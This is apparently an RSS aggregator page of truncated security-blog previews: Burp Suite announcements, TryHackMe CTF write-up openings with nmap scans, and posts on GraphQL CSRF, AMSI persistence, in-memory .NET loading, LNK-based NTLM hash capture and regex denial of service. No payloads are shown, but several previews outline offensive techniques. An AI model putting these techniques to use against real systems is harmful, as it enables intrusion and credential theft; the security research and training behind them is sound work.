    Obligatory FAQ note: Sometimes I get asked questions, e.g. on IRC, via e-mail or during my livestreams. And sometimes I get asked the same question repeatedly. To save myself some time (*cough* and be able to give the same answer instead of conflicting ones *cough*) I decided to write up selected question and answer pairs in separate blog posts. Please remember that these answers are by no means authoritative - they are limited by my experience, my knowledge and my opinions on things. Do look in the comment section as well - a lot of smart people read my blog and might have a different, and likely better, answer to the same question. If you disagree or just have something to add - by all means, please do comment. Q: How to find exploits in software? Q: How did you find this CVE? (in …

  • Open

    Great getting started resources for new users of Burp Suite Professional
    If you're new to Burp Suite Professional, then congratulations. Not only have you just bought into the world's leading toolkit for web security testing - you've also joined a massive worldwide communi  ( 5 min )
  • Open

    Great getting started resources for new users of Burp Suite Professional
    If you're new to Burp Suite Professional, then congratulations. Not only have you just bought into the world's leading toolkit for web security testing - you've also joined a massive worldwide communi  ( 5 min )

  • Open

    TryHackMe > Debug
    Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Contents 1 User flag 1.1 Open ports 1.2 Web enumeration 1.3 The index.php.bak file 1.4 PHP serialization exploit 1.5 James password 1.6 User flag 2 Root flag 2.1 Message from root 2.2 The motd service 2.3 Reverse shell and root flag User flag Open ports Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA) | 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA) |_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519) 80/tcp open http …
  • Open

    VMware Workspace One and Flexera Address Software Vulnerabilities
    Keeping ahead of software vulnerabilities is a tough task. No matter the organization, industry, location or experience, vulnerable applications pop up all over the place all the time. The SolarWinds breach in late 2020 or the ransomware attack that closed down the Colonial Pipeline supplying nearly half the gasoline to the East Coast are just a couple of recent major examples of the effects of a breach, but they’re just waiting to happen every day. Luckily for all of us in the information technology industry, there are plenty of amazing hackers and security experts on the side of stopping these…

  • Open

    That single GraphQL issue that you keep missing
    With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations. GraphQL what? GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are: Aggregating data from multiple sources Decoupling the data from the database underneath, through a graph form Ensuring input type correctness with minimal effort from the developers CSRF eh? Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies. Gra…  ( 5 min )
  • Open

    An experiment in helping users and web publishers create deeper connections on Chrome
    Today, people have many ways to keep up with their favorite websites, including subscribing to mailing lists, notifications and RSS. It’s a lot for any one person to manage, so we’re exploring how to simplify the experience of getting the latest and greatest from your favorite sites directly in Chrome, building on the open RSS web standard. Our vision is to help people build a direct connection with their favorite publishers and creators on the web. In the coming weeks, some Android users in the US on Chrome Canary may see an experimental Follow feature designed to help people get the latest content from sites they follow. Our goal for this feature is to allow people to follow the websites they care about, from the large publishers to the small neighborhood blogs, by tapping a Follow button in Chrome. When websites publish content, users can see updates from sites they have followed in a new Following section on the New Tab page: Keeping a site’s RSS up-to-date will ensure Chrome can provide the latest content to users with this experiment. We will provide more guidance to web publishers as we learn and evaluate whether this feature will graduate from an experiment to a broader rollout in Chrome. We welcome feedback from publishers, bloggers, creators, and citizens of the open web (like you!) on this experiment as we aim to build deeper engagement between users and web publishers in Chrome. You can also stay up-to-date and ask us questions via @WebCreators on Twitter or via email to webcreators@google.com. As part of this year’s Google I/O, we’ll be hosting a Meet Up for web publishers, creators and developers who would like to learn more, ask questions and share feedback. You can sign up for I/O (free this year) and register for the Following on the Open Web session, being held on May 19 (today) at 11 AM PT. Posted by Janice Wong, Product Manager, Google Chrome

  • Open

    Persistence – AMSI
    AMSI (Antimalware Scan Interface) is a vendor agnostic interface which can communicate with the endpoint in order to prevent execution of malware. The scan performed… Continue reading → Persistence – AMSI  ( 5 min )
  • Open

    Persistence – AMSI
    AMSI (Antimalware Scan Interface) is a vendor agnostic interface which can communicate with the endpoint in order to prevent execution of malware. The scan performed… Continue reading → Persistence – AMSI  ( 5 min )

  • Open

    TryHackMe > En-pass
    Get what you can’t. Think-out-of-the-box Contents 1 Name The Path. 1.1 Enumeration (1st level) 1.2 The zip directory 1.3 The web directory 2 What is the user flag? 2.1 SSH private key 2.2 The reg.php page 2.3 403 Fuzzing 2.4 SSH Connection 3 What is the root flag? 3.1 Cronjob 3.2 The script 3.3 Exploit 3.4 Root shell Name The Path. Nmap detects 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA) | 256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA) |_ 256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (ED25519) 8001/tcp open http Apache httpd 2.4.18 ((…

  • Open

    TryHackMe > Wekor
    CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this ! This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine. Feel free to ask any questions…It’s okay to be confused in some parts of the box ;) Just a quick note, Please use the domain wekor.thm as it could be useful later on in the box ;) Contents 1 User flag 1.1 Nmap scan 1.2 Robots.txt 1.3 SQL Injection 1.4 Wordpress credentials 1.5 Wordpress 1.6 Reverse Shell 1.7 Lateral move (www-data -> Orka) 1.8 User flag 2 Root flag 2.1 O…

  • Open

    TryHackMe > Bookstore
    A Beginner level box with basic web enumeration and REST API Fuzzing. Contents 1 User flag 1.1 Port 80 1.2 Port 5000 1.3 Fuzzing the API (v1) 1.4 User flag 2 Root flag 2.1 Console 2.2 Reverse Engineering (try-harder) 2.3 Root shell User flag Nmap discovers 3 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA) | 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA) |_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Book Store 5000/tcp open http Wer…

  • Open

    Experience Burp Suite Enterprise Edition in a new live demo
    Quick link: Burp Suite Enterprise Edition live demo. Deploying enterprise-grade software isn't always easy. We wanted a quick way for people to see the core features of Burp Suite Enterprise Edition w  ( 2 min )
  • Open

    Experience Burp Suite Enterprise Edition in a new live demo
    Quick link: Burp Suite Enterprise Edition live demo. Deploying enterprise-grade software isn't always easy. We wanted a quick way for people to see the core features of Burp Suite Enterprise Edition w  ( 2 min )

  • Open

    Assembly.Lie – Using Transactional NTFS and API Hooking to Trick the CLR into Loading Your Code “From Disk”
    Introduction: Assembly.Load, a method that has been one of the primary reasons for the meteoric rise in offensive tooling written in C# over the past few years.  Its most commonly used overload in offensive tooling – Assembly.Load(byte[]) allows for memory-only loading of .Net assembly objects (.exe / .dll) directly from a byte array representing the object’s contents, effectively granting the ability to reflectively load and execute a program entirely in memory in just 2-3 lines of code. This has enabled all sorts of multi-staged payloads, modular program functionality, and fileless post-exploitation operations.  A few months back some tooling I was working on caused me to take a closer look into the mechanisms behind loading assemblies into the .net Common Language Runtime (CLR).  I fou…

  • Open

    Hacking with ML
    Let's say that we want to train an ML model to hack web applications. What would that look like in practice? Let's do this thought experiment. We first need to define an environment where the agent (the ML model) can operate and essentially learn. In principle, this would necessitate boiling down the process of web hacking into a limited number of inputs that the agent needs to send in some combination and get rewarded for in return (let's think of this from the perspective of reinforcement learning). For this thought experiment, let's consider that the input is just three buttons (think of them as a game controller) which the agent can press to manipulate the environment. The agent will smash the buttons, and in return, it may get some reward for finding a vulnerability or getting pretty …
    Innovation is Nonlinear
    I am getting obsessed with the nonlinear way of discovering things. For example, let's say you want to use machine learning to classify many strings, but you don't know anything about this topic. The linear approach would be to start learning about ML from the basics, and once you have enough knowledge, you will be able to solve your specific problem. By the time you reach this point, you find out that your problem domain is not a good fit for what you've learned (your knowledge is not practical for the problem domain), and thus the experience is disappointing. The nonlinear way would go like this. You want to classify many strings using machine learning, but you don't know anything about this topic. You download brain.js and start doing some random problems not related to your problem domain which ultimately leads to a discovery or an insight in a different area. Now you innovate. The illusion everyone in tech has is that it is possible to develop innovative solutions by following a linear path: A, B, C, D. But, innovation is never linear. If innovation was linear, it would have been repeatable as it will be possible to work forward and backwards with relative ease. Instead, we know that innovation is random, and it comes from unexpected places.

  • Open

    Recorded logins in Burp Scanner
    If you’re using Burp Suite to test your website, it’s probably got some way for users to log in - and chances are it’s more complicated than filling in a username and password and hitting submit. Burp  ( 6 min )
  • Open

    Recorded logins in Burp Scanner
    If you’re using Burp Suite to test your website, it’s probably got some way for users to log in - and chances are it’s more complicated than filling in a username and password and hitting submit. Burp  ( 6 min )

  • Open

    On #DFIR Analysis, pt III - Benefits of a Structured Model
    In my previous post, I presented some of the basic design elements for a structured approach to describing artifact constellations, and leveraging them to further DFIR analysis. As much of this is new, I'm sure that this all sounds like a lot of work, and if you've read the other posts on this topic, you're probably wondering about the benefits to all this work. In this post, I'll take shot at netting out some of the more obvious benefits. Maintaining Corporate Knowledge Regardless of whether you're talking about an internal corporate position or a consulting role, analysts are going to see and learn new things based on their analysis. You're going to see new applications or techniques used, and perhaps even see the same threat actor making small changes to their TTPs due to some "stimulus…  ( 7 min )

  • Open

    On #DFIR Analysis, pt II - Describing Artifact Constellations
    I've been putting some serious thought into the topic of a new #DFIR model, and in an effort to extend and expand upon my previous post a bit, I wanted to take the opportunity to document and share some of my latest thoughts. I've discussed toolmarks and artifact constellations previously in this blog, and how they apply to attribution. In discussing a new #DFIR model, the question that arises is, how do we describe an artifact or toolmark constellation in a structured manner, so that it can be communicated and shared?   Of course, the next step after that, once we have a structured format for describing these constellations, is automating the sharing and "machine ingestion" of these constellation descriptions. But before we get ahead of ourselves, let's discuss a possible structure a bit …  ( 9 min )

  • Open

    AppSec experts share Burp Suite automation secrets and best practices
    Webinar recording: How to Perform Effective Web Application Security Assessments On 6 April, PortSwigger teamed up with HackerOne to bring you AppSec insights from industry expert Burp Suite users. Le  ( 3 min )
  • Open

    AppSec experts share Burp Suite automation secrets and best practices
    Webinar recording: How to Perform Effective Web Application Security Assessments On 6 April, PortSwigger teamed up with HackerOne to bring you AppSec insights from industry expert Burp Suite users. Le  ( 3 min )

  • Open

    LNK Files, Again
    I ran across SharpWebServer via Twitter recently...the first line of the readme.md file states, "A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes." I thought this was fascinating because it ties directly to a technique MITRE refers to as "Forced Authentication".  What this means is that a threat actor can (and has...we'll get to that shortly) modify Windows shortcut/LNK files such that the iconfilename field points to an external resource. What happens is that when LNK file is launched, Explorer will reach out to the external resource and attempt to authenticate, sending NTLM hashes across the wire.  As such, SharpWebServer is built to capture those hashes. What this means is that a threat actor can gain access to an infrastructure, and as has been observed, use various means to maintain persistence...drop backdoors or RATs, create accounts on Internet-facing systems, etc.  However, many (albeit not all) of these means of persistence can be overcome via the judicious use of AV, EDR monitoring, and a universal password change. Modifying the iconfilename field of an LNK file is a means of persisting beyond password changes, because even after passwords are change, the updated hashes will be sent across the wire. Now, I did say earlier that this has been used before, and it has.  CISA Alert TA18-074A includes a section named "Persistence through LNK file manipulation".  Note that from the alert, when looking at the "Contents of enu.cmd", "Persistence through LNK file manipulation", and "Registry Modification" sections, we can see a pretty comprehensive set of toolmarks associated with this threat actor.  This is excellent intrusion intelligence, and should be incorporated into any and all #DFIR parsing, enrichment and decoration, as well as threat hunting. However, things are even better! This tweet from bohops illustrates how to apply this technique to MSWord docs.  ( 4 min )
    On #DFIR Analysis
    I wanted to take the opportunity to discuss DFIR analysis; when discussing #DFIR analysis, we have to ask the question, "what _is_ "analysis"?" In most cases, what we call analysis is really just parsing some data source (or sources) and either viewing the output of the tools, or running keyword searches.  When this is the entire process, it is not analysis...it's running keyword searches. Don't get me wrong, there is nothing wrong with keyword searches, as they're a great way to orient yourself to the data and provide pivot points into further analysis.  However, these searches should not be considered the end of your analysis; rather, they are simply be beginning, or at least early stages of the analysis. The issue is that parsing data sources in isolation from each other and just runnin…  ( 10 min )

  • Open

    Simplified cloud deployment for Burp Suite Enterprise Edition
    Last year, we made Burp Suite Enterprise Edition cloud-friendly. Organizations migrating to the cloud, or taking a cloud-first approach, are able to deploy Burp Suite Enterprise Edition to AWS or Azur  ( 3 min )
  • Open

    Simplified cloud deployment for Burp Suite Enterprise Edition
    Last year, we made Burp Suite Enterprise Edition cloud-friendly. Organizations migrating to the cloud, or taking a cloud-first approach, are able to deploy Burp Suite Enterprise Edition to AWS or Azur  ( 3 min )

  • Open

    PortSwigger teams up with HackerOne for AppSec workshop - 6 April
    Tuesday 6 April, 2021 | 10 AM PT / 1 PM ET / 6 PM GMT Update: this webinar can now be viewed on HackerOne's site, here. AppSec is a tricky business. While expertise remains scarce, threats are only ge  ( 3 min )
  • Open

    PortSwigger teams up with HackerOne for AppSec workshop - 6 April
    Tuesday 6 April, 2021 | 10 AM PT / 1 PM ET / 6 PM GMT Update: this webinar can now be viewed on HackerOne's site, here. AppSec is a tricky business. While expertise remains scarce, threats are only ge  ( 3 min )

  • Open

    Extracting Toolmarks from Open Source Reporting, pt II
    On the heels of my previous post on this subject, I ran across this little gem from Microsoft regarding the print spooler EOP exploitation. I like articles like this because they illustrate threat actor activities outside the "norm", or what we usually tend to see in open reporting, if such things are illustrated in detail. Fig 4 (in step 1) in the article illustrates a new printer port being added to a Windows system as a step toward privilege escalation. This serves as one of the more-than-a-few interesting EDR-style tidbits from the article (i.e., detect the Powershell commandline), and also results in a fantastic toolmark that can be applied to DFIR "threat hunting".  The article illustrates, via fig 4, Powershell being used to add a printer port to the system, and that command results…  ( 5 min )
  • Open

    Improved CI/CD integrations in Burp Suite Enterprise Edition
    Burp Suite Enterprise Edition was designed to support your DevSecOps needs. One of the ways it does this is via our pre-built and generic CI/CD driver. This allows users to integrate with tooling of t  ( 4 min )
  • Open

    Improved CI/CD integrations in Burp Suite Enterprise Edition
    Burp Suite Enterprise Edition was designed to support your DevSecOps needs. One of the ways it does this is via our pre-built and generic CI/CD driver. This allows users to integrate with tooling of t  ( 4 min )

  • Open

    Browser powered scanning in Burp Suite
    Since the release of Browser powered scanning back in Burp Suite Professional 2020.8.1 we have had a lot of customers asking us about our motivation for choosing to integrate with Chromium and fo  ( 7 min )
  • Open

    Browser powered scanning in Burp Suite
    Since the release of Browser powered scanning back in Burp Suite Professional 2020.8.1 we have had a lot of customers asking us about our motivation for choosing to integrate with Chromium and fo  ( 7 min )

  • Open

    API Scanning with Burp Suite
    Both Burp Suite Professional and Burp Suite Enterprise Edition contain Burp Scanner - allowing users to easily scan web applications for vulnerabilities. Other blog posts cover how Burp Scanner’s craw  ( 8 min )
  • Open

    API Scanning with Burp Suite
    Both Burp Suite Professional and Burp Suite Enterprise Edition contain Burp Scanner - allowing users to easily scan web applications for vulnerabilities. Other blog posts cover how Burp Scanner’s craw  ( 8 min )

  • Open

    Regexploit: DoS-able Regular Expressions
    .ansi{ line-height: 1.1; font-family: monospace; margin-left: 1rem; } .myansi { margin-left: 1rem; } .myansi p { margin-bottom: 0.2rem; } code.regex span { color: #fff; padding: 2px 4px; } When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes). Regular expressions are used for all manner of text-proce…  ( 6 min )

  • Open

    A Journey Combining Web Hacking and Binary Exploitation in Real World!
    No content preview
2022-03-09T01:21:18.976Z osmosfeed 1.14.4